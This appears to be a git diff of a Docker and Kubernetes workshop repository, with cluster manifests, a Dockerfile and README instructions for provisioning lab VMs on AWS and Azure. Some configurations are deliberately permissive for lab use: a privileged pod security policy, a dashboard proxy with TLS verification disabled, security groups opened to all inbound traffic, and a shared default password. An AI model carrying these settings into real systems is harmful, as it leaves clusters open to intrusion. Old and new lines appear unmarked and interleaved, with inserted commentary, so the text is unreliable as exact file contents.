apiGroup: rbac.authorization.k8s.io
---
apiVersion: v1
kind: Service
metadata:
name: px-lighthouse
namespace: kube-system
labels:
tier: px-web-console
spec:
type: NodePort
ports:
- name: http
port: 80
nodePort: 32678
- name: https
port: 443
nodePort: 32679
selector:
tier: px-web-console
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
name: px-lighthouse
namespace: kube-system
labels:
tier: px-web-console
spec:
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
selector:
matchLabels:
tier: px-web-console
replicas: 1
template:
metadata:
labels:
tier: px-web-console
spec:
initContainers:
- name: config-init
image: portworx/lh-config-sync:0.2
imagePullPolicy: Always
args:
- "init"
volumeMounts:
- name: config
mountPath: /config/lh
containers:
- name: px-lighthouse
image: portworx/px-lighthouse:1.5.0
imagePullPolicy: Always
ports:
- containerPort: 80
- containerPort: 443
volumeMounts:
- name: config
mountPath: /config/lh
- name: config-sync
image: portworx/lh-config-sync:0.2
imagePullPolicy: Always
args:
- "sync"
volumeMounts:
- name: config
mountPath: /config/lh
serviceAccountName: px-lh-account
volumes:
- name: config
emptyDir: {}

View File

@@ -1,30 +0,0 @@
apiVersion: apps/v1
kind: StatefulSet
metadata:
name: postgres
spec:
selector:
matchLabels:
app: postgres
serviceName: postgres
template:
metadata:
labels:
app: postgres
spec:
schedulerName: stork
containers:
- name: postgres
image: postgres:10.5
volumeMounts:
- mountPath: /var/lib/postgresql/data
name: postgres
volumeClaimTemplates:
- metadata:
name: postgres
spec:
accessModes: ["ReadWriteOnce"]
resources:
requests:
storage: 1Gi

View File

@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: privileged
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:privileged
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['privileged']

View File

@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
annotations:
apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
name: restricted
spec:
allowPrivilegeEscalation: false
fsGroup:
rule: RunAsAny
runAsUser:
rule: RunAsAny
seLinux:
rule: RunAsAny
supplementalGroups:
rule: RunAsAny
volumes:
- configMap
- emptyDir
- projected
- secret
- downwardAPI
- persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: psp:restricted
rules:
- apiGroups: ['policy']
resources: ['podsecuritypolicies']
verbs: ['use']
resourceNames: ['restricted']

View File

@@ -1,15 +0,0 @@
apiVersion: v1
kind: Pod
metadata:
name: registry
spec:
containers:
- name: registry
image: registry
env:
- name: REGISTRY_HTTP_ADDR
valueFrom:
configMapKeyRef:
name: registry
key: http.addr
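This pod takes the registry's listening address from a ConfigMap named `registry`; a matching ConfigMap could be created as follows (the `0.0.0.0:9999` value is only an example address/port):

```bash
# provide the http.addr key that the pod's configMapKeyRef expects
kubectl create configmap registry --from-literal=http.addr=0.0.0.0:9999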

View File

@@ -1,67 +0,0 @@
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
annotations:
deployment.kubernetes.io/revision: "2"
creationTimestamp: null
generation: 1
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /apis/extensions/v1beta1/namespaces/kube-system/deployments/socat
spec:
replicas: 1
selector:
matchLabels:
app: socat
strategy:
rollingUpdate:
maxSurge: 1
maxUnavailable: 1
type: RollingUpdate
template:
metadata:
creationTimestamp: null
labels:
app: socat
spec:
containers:
- args:
- sh
- -c
- apk add --no-cache socat && socat TCP-LISTEN:80,fork,reuseaddr OPENSSL:kubernetes-dashboard:443,verify=0
image: alpine
imagePullPolicy: Always
name: socat
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
restartPolicy: Always
schedulerName: default-scheduler
securityContext: {}
terminationGracePeriodSeconds: 30
status: {}
---
apiVersion: v1
kind: Service
metadata:
creationTimestamp: null
labels:
app: socat
name: socat
namespace: kube-system
selfLink: /api/v1/namespaces/kube-system/services/socat
spec:
externalTrafficPolicy: Cluster
ports:
- port: 80
protocol: TCP
targetPort: 80
selector:
app: socat
sessionAffinity: None
type: NodePort
status:
loadBalancer: {}

View File

@@ -1,11 +0,0 @@
kind: StorageClass
apiVersion: storage.k8s.io/v1beta1
metadata:
name: portworx-replicated
annotations:
storageclass.kubernetes.io/is-default-class: "true"
provisioner: kubernetes.io/portworx-volume
parameters:
repl: "2"
priority_io: "high"

View File

@@ -1,100 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: traefik-ingress-controller
namespace: kube-system
---
kind: DaemonSet
apiVersion: extensions/v1beta1
metadata:
name: traefik-ingress-controller
namespace: kube-system
labels:
k8s-app: traefik-ingress-lb
spec:
template:
metadata:
labels:
k8s-app: traefik-ingress-lb
name: traefik-ingress-lb
spec:
tolerations:
- effect: NoSchedule
operator: Exists
hostNetwork: true
serviceAccountName: traefik-ingress-controller
terminationGracePeriodSeconds: 60
containers:
- image: traefik
name: traefik-ingress-lb
ports:
- name: http
containerPort: 80
hostPort: 80
- name: admin
containerPort: 8080
hostPort: 8080
securityContext:
capabilities:
drop:
- ALL
add:
- NET_BIND_SERVICE
args:
- --api
- --kubernetes
- --logLevel=INFO
---
kind: Service
apiVersion: v1
metadata:
name: traefik-ingress-service
namespace: kube-system
spec:
selector:
k8s-app: traefik-ingress-lb
ports:
- protocol: TCP
port: 80
name: web
- protocol: TCP
port: 8080
name: admin
---
kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
rules:
- apiGroups:
- ""
resources:
- services
- endpoints
- secrets
verbs:
- get
- list
- watch
- apiGroups:
- extensions
resources:
- ingresses
verbs:
- get
- list
- watch
---
kind: ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1beta1
metadata:
name: traefik-ingress-controller
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: traefik-ingress-controller
subjects:
- kind: ServiceAccount
name: traefik-ingress-controller
namespace: kube-system

View File

@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
name: jean.doe
namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
resources: [ certificatesigningrequests ]
verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
resourceNames: [ users:jean.doe ]
resources: [ certificatesigningrequests ]
verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
name: users:jean.doe
roleRef:
apiGroup: rbac.authorization.k8s.io
kind: ClusterRole
name: users:jean.doe
subjects:
- kind: ServiceAccount
name: jean.doe
namespace: users

View File

@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node2
annotations:
node: node2
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node3
annotations:
node: node3
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
annotations:
node: node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -1,5 +0,0 @@
[build]
base = "slides"
publish = "slides"
command = "./build.sh once"

View File

@@ -32,7 +32,7 @@ Virtualbox, Vagrant and Ansible
$ source path/to/your-ansible-clone/hacking/env-setup
- you need to repeat the last step every time you open a new terminal session
- you need to repeat the last step everytime you open a new terminal session
and want to use any Ansible command (but you'll probably only need to run
it once).

View File

@@ -71,7 +71,7 @@ to your node, then run the following command:
```bash
sudo curl -L \
https://github.com/docker/compose/releases/download/1.15.0/docker-compose-`uname -s`-`uname -m` \
https://github.com/docker/compose/releases/download/1.9.0/docker-compose-`uname -s`-`uname -m` \
-o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
```

View File

@@ -2,6 +2,7 @@ FROM debian:jessie
MAINTAINER AJ Bowen <aj@soulshake.net>
RUN apt-get update && apt-get install -y \
wkhtmltopdf \
bsdmainutils \
ca-certificates \
curl \
@@ -11,20 +12,19 @@ RUN apt-get update && apt-get install -y \
man \
pssh \
python \
python-docutils \
python-pip \
python-docutils \
ssh \
wkhtmltopdf \
xvfb \
--no-install-recommends \
&& rm -rf /var/lib/apt/lists/*
RUN pip install \
awscli \
jinja2 \
pdfkit \
PyYAML \
termcolor
RUN mv $(which wkhtmltopdf) $(which wkhtmltopdf).real
COPY lib/wkhtmltopdf /usr/local/bin/wkhtmltopdf
WORKDIR $$HOME
RUN echo "alias ll='ls -lahF'" >> /root/.bashrc
ENTRYPOINT ["/root/prepare-vms/scripts/trainer-cli"]

View File

@@ -1,194 +1,110 @@
# Trainer tools to create and prepare VMs for Docker workshops
These tools can help you to create VMs on:
- Azure
- EC2
- OpenStack
# Trainer tools to create and prepare VMs for Docker workshops on AWS
## Prerequisites
- [Docker](https://docs.docker.com/engine/installation/)
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`) - the configuration scripts require this
Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
And if you want to generate printable cards:
- [pyyaml](https://pypi.python.org/pypi/PyYAML) (on a Mac: `brew install pyyaml`)
- [jinja2](https://pypi.python.org/pypi/Jinja2) (on a Mac: `brew install jinja2`)
## General Workflow
- fork/clone repo
- create an infrastructure configuration in the `prepare-vms/infra` directory
(using one of the example files in that directory)
- set required environment variables for AWS
- create your own setting file from `settings/example.yaml`
- if necessary, increase allowed open files: `ulimit -Sn 10000`
- run `./workshopctl start` to create instances
- run `./workshopctl deploy` to install Docker and setup environment
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
- run `./workshopctl cards` (if you want to generate PDFs for printing handouts with each user's host IPs and login info)
- run `./workshopctl stop` at the end of the workshop to terminate instances
- run `./trainer` commands to create instances, install docker, setup each users environment in node1, other management tasks
- run the `./trainer cards` command to generate PDFs for printing handouts with each user's host IPs and login info
## Clone/Fork the Repo, and Build the Tools Image
The Docker Compose file here is used to build an image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
The Docker Compose file here is used to build an image with all the dependencies to run the `./trainer` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](trainer#L5).
$ git clone https://github.com/jpetazzo/container.training
$ cd container.training/prepare-vms
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
$ cd orchestration-workshop/prepare-vms
$ docker-compose build
## Preparing to Run `./workshopctl`
## Preparing to Run `./trainer`
### Required AWS Permissions/Info
- The initial assumption is that you're using a root account. If you'd like to use an IAM user, it will need `AmazonEC2FullAccess` and `IAMReadOnlyAccess`.
- Using a non-default VPC or Security Group isn't supported out of the box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will use the default VPC Security Group, which does not open any ports from the Internet by default. So you'll need to add inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg`, which opens up all ports.
- Using a non-default VPC or Security Group isn't supported out of the box yet, but until then you can [customize the `trainer-cli` script](scripts/trainer-cli#L396-L401).
- These instances will use the default VPC Security Group, which does not open any ports from the Internet by default. So you'll need to add inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./trainer opensg`, which opens up all ports.
### Create your `infra` file
### Required Environment Variables
You need to do this only once. (On AWS, you can create one `infra`
file per region.)
- `AWS_ACCESS_KEY_ID`
- `AWS_SECRET_ACCESS_KEY`
- `AWS_DEFAULT_REGION`
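For instance, these could be set like this (placeholder values; substitute your own credentials and preferred region):

```bash
export AWS_ACCESS_KEY_ID=AKIAXXXXXXXXXXXXXXXX
export AWS_SECRET_ACCESS_KEY=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
export AWS_DEFAULT_REGION=eu-west-1
```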
Make a copy of one of the example files in the `infra` directory.
### Update/copy `settings/example.yaml`
For instance:
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `trainer deploy`, `trainer cards`, etc.
```bash
cp infra/example.aws infra/aws-us-west-2
```
./trainer cards 2016-09-28-00-33-bret settings/orchestration.yaml
Edit your infrastructure file to customize it.
You will probably need to enter your cloud provider credentials, select a region, and so on.
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
### Create your `settings` file
Similarly, pick one of the files in `settings` and copy it
to customize it.
For instance:
```bash
cp settings/example.yaml settings/myworkshop.yaml
```
You're all set!
## `./workshopctl` Usage
## `./trainer` Usage
```
workshopctl - the orchestration workshop swiss army knife
Commands:
ami Show the AMI that will be used for deployment
amis List Ubuntu AMIs in the current region
build Build the Docker image to run this program in a container
cards Generate ready-to-print cards for a group of VMs
deploy Install Docker on a bunch of running VMs
ec2quotas Check our EC2 quotas (max instances)
help Show available commands
ids List the instance IDs belonging to a given tag or token
ips List the IP addresses of the VMs for a given tag or token
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
kubetest Check that all notes are reporting as Ready
list List available groups in the current region
opensg Open the default security group to ALL ingress traffic
pull_images Pre-pull a bunch of Docker images
retag Apply a new tag to a group of VMs
start Start a group of VMs
status List instance status for a given group
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
test Run tests (pre-flight checks) on a group of VMs
wrap Run this program in a container
./trainer <command> [n-instances|tag] [settings/file.yaml]
Core commands:
start n Start n instances
list [TAG] If a tag is provided, list its VMs. Otherwise, list tags.
deploy TAG Deploy all instances with a given tag
pull-images TAG Pre-pull docker images. Run only after deploying.
stop TAG Stop and delete instances tagged TAG
Extras:
ips TAG List all IPs of instances with a given tag (updates ips.txt)
ids TAG/TOKEN List all instance IDs with a given tag
shell Get a shell in the trainer container
status TAG Print information about this tag and its VMs
tags List all tags (per-region)
retag TAG/TOKEN TAG Retag instances with a new tag
Beta:
ami Look up Amazon Machine Images
cards FILE Generate cards
opensg Modify AWS security groups
```
### Summary of What `./workshopctl` Does For You
### Summary of What `./trainer` Does For You
- Used to manage batches of AWS instances for you without needing to use the AWS CLI or GUI directly.
- Can manage multiple "tags" or groups of instances, which are tracked in `prepare-vms/tags/`
- Can also create PDF/HTML cards to print and hand out, listing each student's instance IPs and login info.
- The `./workshopctl` script can be executed directly.
- The `./trainer` script can be executed directly.
- It will run locally if all its dependencies are fulfilled; otherwise it will run in the Docker container you created with `docker-compose build` (preparevms_prepare-vms).
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
- During `deploy` it will create the `docker` user with password `training`, which is printed on the cards handed out to students. This can be configured with the `docker_user_password` property in the settings file.
- During `deploy` it will create the `docker` user with password `training`, which is printed on the cards handed out to students. For now, this is hard-coded.
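Conceptually, the student account setup performed during `deploy` boils down to something like the following (a hedged sketch of equivalent shell commands, not the actual contents of the post-provisioning script):

```bash
# Rough equivalent of the student account setup (sketch only; the real logic
# lives in the post-provisioning script run by deploy).
sudo useradd --create-home --shell /bin/bash docker
echo 'docker:training' | sudo chpasswd        # the password printed on the cards
sudo usermod -aG docker docker                # assumption: grant access to the Docker daemon's group
```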
### Example Steps to Launch a Group of AWS Instances for a Workshop
### Example Steps to Launch a Batch of Instances for a Workshop
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings settings/myworkshop.yaml --count 60` to create 60 EC2 instances
- Export the environment variables needed by the AWS CLI (see **Required Environment Variables** above)
- Run `./trainer start N` Creates `N` EC2 instances
- Your local SSH key will be synced to the instances under the `ubuntu` user
- AWS instances will be created and tagged based on date, and their IPs stored in `prepare-vms/tags/`
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
- Run `./trainer deploy TAG settings/somefile.yaml` to run `scripts/postprep.rc` via parallel-ssh
- If it errors or times out, you should be able to re-run it
- Requires a good connection to run all the parallel SSH connections (up to 100 in parallel). Pro tip: create a dedicated management instance in the same AWS region and run these utilities from there. (A quick connectivity check is sketched just after this list.)
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG` generates PDF/HTML files to print and cut and hand out to students
- Run `./trainer pull-images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./trainer cards TAG settings/somefile.yaml` generates PDF/HTML files to print and cut and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.
- Run `./trainer stop TAG` to terminate instances.
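Before (or after) `deploy`, it can be worth verifying that every instance in the tag answers over SSH. A minimal sketch, assuming the tag's `ips.txt` holds one address per line:

```bash
# Minimal reachability check over the generated IP list (one address per line).
TAG=2016-09-28-00-33-bret        # example tag name borrowed from this document
while read -r ip; do
  if ssh -o BatchMode=yes -o ConnectTimeout=5 "ubuntu@$ip" true; then
    echo "OK   $ip"
  else
    echo "FAIL $ip"
  fi
done < "tags/$TAG/ips.txt"
```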
### Example Steps to Launch Azure Instances
## Other Tools
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
- Customize `azuredeploy.parameters.json`
- Required:
- Provide the SSH public key you plan to use for instance configuration
- Optional:
- Choose a name for the workshop (default is "workshop")
- Choose the number of instances (default is 3)
- Customize the desired instance size (default is Standard_D1_v2)
- Launch instances with your chosen resource group name and your preferred region; the examples are "workshop" and "eastus":
```
az group create --name workshop --location eastus
az group deployment create --resource-group workshop --template-file azuredeploy.json --parameters @azuredeploy.parameters.json
```
### Deploying your SSH key to all the machines
The `az group deployment create` command can take several minutes and will only say `- Running ..` until it completes, unless you increase the verbosity with `--verbose` or `--debug`.
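If you'd rather not edit `azuredeploy.parameters.json`, the Azure CLI also accepts inline `key=value` parameter overrides (this is standard `az` behavior; check `az group deployment create --help` if your CLI version differs). For example, to raise the instance count and pass your public key directly:

```
az group deployment create \
    --resource-group workshop \
    --template-file azuredeploy.json \
    --parameters @azuredeploy.parameters.json \
    --parameters numberOfInstances=10 sshKeyData="$(cat ~/.ssh/id_rsa.pub)"
```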
- Make sure that you have SSH keys loaded (`ssh-add -l`).
- Source `rc`.
- Run `pcopykey`.
To display the IPs of the instances you've launched:
```
az vm list-ip-addresses --resource-group workshop --output table
```
### Installing extra packages
If you want to put the IPs into `prepare-vms/tags/<tag>/ips.txt` for a tag of "myworkshop":
1) If you haven't yet installed `jq` and/or created your event's tags directory in `prepare-vms`:
```
brew install jq
mkdir -p tags/myworkshop
```
2) And then generate the IP list:
```
az vm list-ip-addresses --resource-group workshop --output json | jq -r '.[].virtualMachine.network.publicIpAddresses[].ipAddress' > tags/myworkshop/ips.txt
```
After the workshop is over, remove the instances:
```
az group delete --resource-group workshop
```
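If you want the deletion to run without the confirmation prompt and without blocking your terminal, the same command takes the usual `--yes` and `--no-wait` flags:

```
az group delete --resource-group workshop --yes --no-wait
```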
### Example Steps to Configure Instances from a non-AWS Source
- Copy `infra/example.generic` to `infra/generic`
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
- Edit the file `prepare-vms/tags/TAG/ips.txt`; it should list the IP addresses of the VMs, one per line, without any comments or other info (see the example just after this list)
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
- Optionally, configure Kubernetes clusters of the size specified in the settings: `workshopctl kube TAG`
- Optionally, test your Kubernetes clusters (they may take a little time to become ready): `workshopctl kubetest TAG`
- Generate cards to print and hand out: `workshopctl cards TAG`
- Print the cards file: `prepare-vms/tags/TAG/ips.html`
- Source `postprep.rc`.
(This will install a few extra packages, add entries to
/etc/hosts, generate SSH keys, and deploy them on all hosts.)
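For reference, a hand-written `prepare-vms/tags/TAG/ips.txt` is nothing more than a bare list of addresses; a sketch using placeholder (documentation-range) IPs:

```bash
# Placeholder addresses from the 203.0.113.0/24 documentation range;
# substitute the real public IPs of your VMs, one per line, nothing else.
mkdir -p tags/myworkshop
cat > tags/myworkshop/ips.txt <<'EOF'
203.0.113.11
203.0.113.12
203.0.113.13
EOF
```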
## Even More Details
@@ -201,7 +117,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
#### Instance + tag creation
The VMs will be started, with an automatically generated tag (timestamp + your username).
10 VMs will be started, with an automatically generated tag (timestamp + your username).
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
@@ -209,37 +125,39 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
Following the creation of the VMs, a text file will be created containing a list of their IPs.
This `ips.txt` file will be created in the `$TAG/` directory, and a symlink will be placed in the working directory of the script.
If you create new VMs, the symlinked file will be overwritten.
#### Deployment
Instances can be deployed manually using the `deploy` command:
$ ./workshopctl deploy TAG
$ ./trainer deploy TAG settings/somefile.yaml
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
The `postprep.rc` file will be copied via parallel-ssh to all of the VMs and executed.
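Under the hood this is a parallel-ssh run; a hand-rolled equivalent would look roughly like the sketch below (the parallelism, timeout, and `sudo python` interpreter choice are illustrative assumptions, not the script's exact invocation):

```bash
# Feed the post-provisioning script to every host in parallel and run it remotely.
# Illustrative only: flags and interpreter are assumptions, not the exact call.
pssh -h tags/TAG/ips.txt -l ubuntu -p 100 -t 900 -I "sudo python" < lib/postprep.py
```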
#### Pre-pull images
$ ./workshopctl pull_images TAG
$ ./trainer pull-images TAG
#### Generate cards
$ ./workshopctl cards TAG
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency. If you plan to just print the HTML cards, you can ignore this.
$ ./trainer cards TAG settings/somefile.yaml
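If only the HTML file was generated (because `wkhtmltopdf` wasn't installed at the time), you can still produce a PDF by hand later; a minimal sketch, assuming the cards ended up in the tag's directory:

```bash
# Manual HTML-to-PDF conversion; assumes wkhtmltopdf is now installed and
# that the generated cards live under the tag's directory.
wkhtmltopdf tags/TAG/ips.html tags/TAG/ips.pdf
```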
#### List tags
$ ./workshopctl list infra/some-infra-file
$ ./trainer list
$ ./workshopctl listall
#### List VMs
$ ./workshopctl tags
$ ./trainer list TAG
This will print a human-friendly list containing some information about each instance.
#### Stop and destroy VMs
$ ./workshopctl stop TAG
$ ./trainer stop TAG
## ToDo

View File

@@ -1,250 +0,0 @@
{
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workshopName": {
"type": "string",
"defaultValue": "workshop",
"metadata": {
"description": "Workshop name."
}
},
"vmPrefix": {
"type": "string",
"defaultValue": "node",
"metadata": {
"description": "Prefix for VM names."
}
},
"numberOfInstances": {
"type": "int",
"defaultValue": 3,
"metadata": {
"description": "Number of VMs to create."
}
},
"adminUsername": {
"type": "string",
"defaultValue": "ubuntu",
"metadata": {
"description": "Admin username for VMs."
}
},
"sshKeyData": {
"type": "string",
"defaultValue": "",
"metadata": {
"description": "SSH rsa public key file as a string."
}
},
"imagePublisher": {
"type": "string",
"defaultValue": "Canonical",
"metadata": {
"description": "OS image publisher; default Canonical."
}
},
"imageOffer": {
"type": "string",
"defaultValue": "UbuntuServer",
"metadata": {
"description": "The name of the image offer. The default is Ubuntu"
}
},
"imageSKU": {
"type": "string",
"defaultValue": "16.04-LTS",
"metadata": {
"description": "Version of the image. The default is 16.04-LTS"
}
},
"vmSize": {
"type": "string",
"defaultValue": "Standard_D1_v2",
"metadata": {
"description": "VM Size."
}
}
},
"variables": {
"vnetID": "[resourceId('Microsoft.Network/virtualNetworks',variables('virtualNetworkName'))]",
"subnet1Ref": "[concat(variables('vnetID'),'/subnets/',variables('subnet1Name'))]",
"vmName": "[parameters('vmPrefix')]",
"sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
"publicIPAddressName": "PublicIP",
"publicIPAddressType": "Dynamic",
"virtualNetworkName": "MyVNET",
"netSecurityGroup": "MyNSG",
"addressPrefix": "10.0.0.0/16",
"subnet1Name": "subnet-1",
"subnet1Prefix": "10.0.0.0/24",
"nicName": "myVMNic"
},
"resources": [
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/publicIPAddresses",
"name": "[concat(variables('publicIPAddressName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "publicIPLoop",
"count": "[parameters('numberOfInstances')]"
},
"properties": {
"publicIPAllocationMethod": "[variables('publicIPAddressType')]"
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/virtualNetworks",
"name": "[variables('virtualNetworkName')]",
"location": "[resourceGroup().location]",
"dependsOn": [
"[concat('Microsoft.Network/networkSecurityGroups/', variables('netSecurityGroup'))]"
],
"properties": {
"addressSpace": {
"addressPrefixes": [
"[variables('addressPrefix')]"
]
},
"subnets": [
{
"name": "[variables('subnet1Name')]",
"properties": {
"addressPrefix": "[variables('subnet1Prefix')]",
"networkSecurityGroup": {
"id": "[resourceId('Microsoft.Network/networkSecurityGroups', variables('netSecurityGroup'))]"
}
}
}
]
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/networkInterfaces",
"name": "[concat(variables('nicName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "nicLoop",
"count": "[parameters('numberOfInstances')]"
},
"dependsOn": [
"[concat('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'),copyIndex(1))]",
"[concat('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]"
],
"properties": {
"ipConfigurations": [
{
"name": "ipconfig1",
"properties": {
"privateIPAllocationMethod": "Dynamic",
"publicIPAddress": {
"id": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'), copyIndex(1)))]"
},
"subnet": {
"id": "[variables('subnet1Ref')]"
}
}
}
]
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-12-01",
"type": "Microsoft.Compute/virtualMachines",
"name": "[concat(variables('vmName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "vmLoop",
"count": "[parameters('numberOfInstances')]"
},
"dependsOn": [
"[concat('Microsoft.Network/networkInterfaces/', variables('nicName'), copyIndex(1))]"
],
"properties": {
"hardwareProfile": {
"vmSize": "[parameters('vmSize')]"
},
"osProfile": {
"computerName": "[concat(variables('vmName'),copyIndex(1))]",
"adminUsername": "[parameters('adminUsername')]",
"linuxConfiguration": {
"disablePasswordAuthentication": true,
"ssh": {
"publicKeys": [
{
"path": "[variables('sshKeyPath')]",
"keyData": "[parameters('sshKeyData')]"
}
]
}
}
},
"storageProfile": {
"osDisk": {
"createOption": "FromImage"
},
"imageReference": {
"publisher": "[parameters('imagePublisher')]",
"offer": "[parameters('imageOffer')]",
"sku": "[parameters('imageSKU')]",
"version": "latest"
}
},
"networkProfile": {
"networkInterfaces": [
{
"id": "[resourceId('Microsoft.Network/networkInterfaces', concat(variables('nicName'),copyIndex(1)))]"
}
]
}
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/networkSecurityGroups",
"name": "[variables('netSecurityGroup')]",
"location": "[resourceGroup().location]",
"tags": {
"workshop": "[parameters('workshopName')]"
},
"properties": {
"securityRules": [
{
"name": "default-open-ports",
"properties": {
"protocol": "Tcp",
"sourcePortRange": "*",
"destinationPortRange": "*",
"sourceAddressPrefix": "*",
"destinationAddressPrefix": "*",
"access": "Allow",
"priority": 1000,
"direction": "Inbound"
}
}
]
}
}
],
"outputs": {
"resourceID": {
"type": "string",
"value": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'),'1'))]"
}
}
}

Some files were not shown because too many files have changed in this diff.